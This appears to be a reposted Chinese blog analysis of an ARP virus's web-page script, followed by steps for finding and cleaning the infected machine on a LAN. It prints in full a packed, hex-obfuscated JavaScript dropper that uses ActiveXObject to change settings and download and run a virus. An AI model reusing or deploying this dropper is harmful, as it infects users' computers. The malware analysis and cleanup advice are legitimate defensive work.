//以下代码为网上搜索所得，版权归原作者所有

无标题文档

</p><p>

经过解密后代码为：

info = “”

document.write(info)

继续打开这个表面象图片的链接，呵呵，当然不会是MM图片了，查看源代码，找到如下代码：

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('E n=1c;12 13(){}12 14(){1d{n=1e 1f(“\K\l\r\8\i\3\6\j\3\6\o\3\6\9\C\3\s\K\l\r\8\i\3\6\9\x”)}1g(e){Q}E a=n[“\15\3\4\p\d\8\m\7\k”](“\w\8\4\7\o\7\6\r\f”,“\R\7\q\3\v\5\4\l”,“”);1h(a[“\7\8\i\3\y\L\m”](“\z\f\l\4\5\9\3\y\3”)!=-1){Q}E b=n[“\15\3\4\j\3\6\o\3\6\v\5\4\l”]();b=b[“\f\r\s\f\4\6”](0,2);b+=“\\\v\6\d\k\6\5\J\x\\\K\l\r\8\i\3\J\x\\\1i\3\s\K\l\r\8\i\3\6\\\A\6\d\m\7\q\3\f\\\r\f\3\6\h\d\8\m\7\k\9\7\8\7”;n[“\j\3\4\p\5\q\q\s\5\h\1j\F\8\4\6\D”](1k,13);E c=n[“\w\i\i\p\5\4\3\k\d\6\D”](“\7”);E c=n[“\w\i\i\p\5\4\3\k\d\6\D”](“\5”);E c=n[“\w\i\i\p\5\4\3\k\d\6\D”](“\s”);E c=n[“\w\i\i\p\5\4\3\k\d\6\D”](“\h”);E c=n[“\w\i\i\p\5\4\3\k\d\6\D”](“\i”);n[“\j\3\4\p\d\8\m\7\k”](“\j\5\o\3\v\5\4\l”,“\7”,“\S\f\h\6\7\A\4\16\o\5\6 \f\G\8\3\C \w\h\4\7\o\3\N\L\s\T\3\h\4\t\”\C\f\h\6\7\A\4\9\f\l\3\q\q\“\u\g\o\5\6 \d\G\8\3\C \w\h\4\7\o\3\N\L\s\T\3\h\4\t\”\f\l\3\q\q\9\5\A\A\q\7\h\5\4\7\d\8\“\u\g\o\5\6 \5\B\s\B\h\B\i\B\3\B\m\B\k\g”);n[“\j\3\4\p\d\8\m\7\k”](“\j\5\o\3\v\5\4\l”,“\5”,“\H\g\f\9\U\r\8\t\”\p\V\\\\\v\6\d\k\6\5\J\x\\\\\I\8\4\3\6\8\J\x\\\\\I\F\N\v\17\L\U\F\9\F\N\F \l\4\4\A\1l\O\O\h\1m\x\W\7\18\O\j\X\19\1a\O\i\1n\C\18\Y\Y\W\l\4\Y\1o\“\B\H\B\H\u\g\f\9\U\r\8\t\”\h\z\i\9\3\y\3 \Z\h \4\6\3\3 \h\V\\\\ \Z\m\“\B\H\B\x\u\g”);n[“\j\3\4\p\d\8\m\7\k”](“\j\5\o\3\v\5\4\l”,“\s”,“\f\9\j\A\3\h\7\5\q\R\d\q\i\3\6\f\t\”\1p\D\1q\d\h\r\z\3\8\4\f\“\u\g\s\G\s\9\f\r\s\f\4\6\7\8\k\t\H\B\s\9\q\5\f\4\I\8\i\3\y\L\m\t\”\\\\\“\u\u\g\s\P\G\”\\\\\q\d\h\5\q\f\J\x\\\\\K\3\z\A\d\6\J\x\\\\\p\d\8\4\3\8\4\9\I\F\1r\\\\\“\g”);n[“\j\3\4\p\d\8\m\7\k”](“\j\5\o\3\v\5\4\l”,“\h”,“\d\9\1s\5\z\3\j\A\5\h\3\t\s\u\g\m\d\6\t\5\G\H\g\5\S\h\9\I\4\3\z\f\t\u\9\p\d\r\8\4\g\5\P\P\u\10 \o\5\6 \m\G\h\9\I\4\3\z\f\t\u\9\I\4\3\z\t\5\u\9\v\5\4\l\g\m\P\G\”\\\\\j\X\19\1a\1b\1t\x\1u\W\3\y\3\“\g”);n[“\j\3\4\p\d\8\m\7\k”](“\j\5\o\3\v\5\4\l”,“\i”,“\H\g\4\6\D\10\f\9\F\y\3\h\t\m\u\g\11\h\5\4\h\l\t\3\u\10\11\g\11\C\7\8\i\d\C\9\h\q\d\f\3\t\u\g\S\Z\f\h\6\7\A\4\16”);n[“\j\3\4\p\d\8\m\7\k”](“\w\8\4\7\o\7\6\r\f”,“\v\6\d\4\3\h\4”,“\x”);n[“\j\3\4\p\d\8\m\7\k”](“\w\8\4\7\o\7\6\r\f”,“\R\7\q\3\v\5\4\l”,“\h\V\\\C\7\8\i\d\C\f\\\f\D\f\4\3\z\X\1b\\\z\f\l\4\5\9\3\y\3”);n[“\j\3\4\p\d\8\m\7\k”](“\w\8\4\7\o\7\6\r\f”,“\v\5\6\5\z\3\4\3\6”,b);n[“\j\3\4\p\d\8\m\7\k”](“\w\8\4\7\o\7\6\r\f”,“\F\y\4\17\7\f\4”,“\9\6\5\6\g\9\M\7\A\g\9\3\y\3\g\9\i\d\h\g\9\h\d\z\g\9\s\7\8\g\9\k\M\g\9\M\g\9\4\5\6\g\9\5\6\T\g\9\q\M\l\g\9\f\7\4\g\9\l\1v\y\g\9\4\k\M\g\9\i\q\q\g\9\d\h\y\g\9\o\s\y\g”);n[“\j\3\4\p\d\8\m\7\k”](“\w\8\4\7\o\7\6\r\f”,“\1w\f\3\6\j\3\4”,“\x”);Q}14();',62,95,'|||x65|x74|x61|x72|x69|x6e|x2e||||x6f||x73|x3b|x63|

x64|x53|x67|x68|x66|odks63ls|x76|x43|x6c|x75|x62|x28|x29|x50|x41|

x31|x78|x6d|x70|x2c|x77|x79|var|x45|x3d|x30|x49|x7e|x54|x4f|x7a|

x58|x2F|x2b|return|x46|x3c|x6a|x52|x3a|x2E|x33|x6D|x2f|x7b|x7d|

function|assort_panel_enabled|pslcdkc|x47|x3e|x4c|x6E|x36|x38|x32|

null|try|new|ActiveXObject|catch|if|x57|x6b|106|x3A|x6B|x6F|x6C|x4d|

x44|x35|x4e|x5B|x5D|x71|x55'.split('|'),0,{}))

又是好长的代码，又发现了function(p,a,c,k,e,r)，继续解码，代码很长，请大家自己解码查看吧，这里应用的还是上面的手法，用加密函数加密，然后转换为十六进制，尽最大努力混淆我们的视线，来达到不可告人的目的，这里的代码的主要作用是用另外一种方法下载病毒并运行，思想真的很先进，居然是去调用Web迅雷来下载病毒，然后去运行，作者真的是煞费苦心啊，应用了两种方法下载病毒，“小样，就不信毒不倒你！”，呵呵

杀毒：

说了半天只是分析了一下ARP病毒发作的时候在干什么，下面就说下关于杀毒的问题，其实现在网上有很多这方面的相关教程，我就简单总结一下我的杀毒过程吧；

中了arp病毒必须要先找到中毒的机器

给这个机器断网、杀毒

恢复局域网

其中第一步最关键了，如何才能找到呢？

在局域网随便一台客户机上打开网上邻居，查看工作组计算机，然后等到列表刷新出来后，迅速点击开始-->运行-->cmd-->arp -a回车，如果机器比较多，请多输入几次arp -a，然后仔细查看，你会发现有一台机器的Mac地址和网关的Mac地址相同，恭喜你，这就是那个毒源！

到这台机器的跟前（呵呵，废话真多），剩下的工作相信大家都有很多经验了吧

杀毒！装杀毒软件或者进安全模式更甚者重装机器，总之把病毒干掉就行了；

最后，到不能打开网页的机器上执行这个命令：点击开始-->运行-->cmd-->arp -d回车，然后就可以了，

arp病毒利用的JS技术

，

、

终于一切又恢复了平静，是不是很有成就感呢，呵呵！

【超级病毒技术】相关文章：

1.求职信病毒

2.我PK病毒

3.揭开病毒的奥秘 dll的远程注入技术详解病毒防治

4.超级名言

5.求职信病毒的危害

6.怎么判断病毒性感冒

7.高中病毒作文心得体会

8.KU三号病毒作文

9.关于病毒的说明文

10.关于病毒的心得体会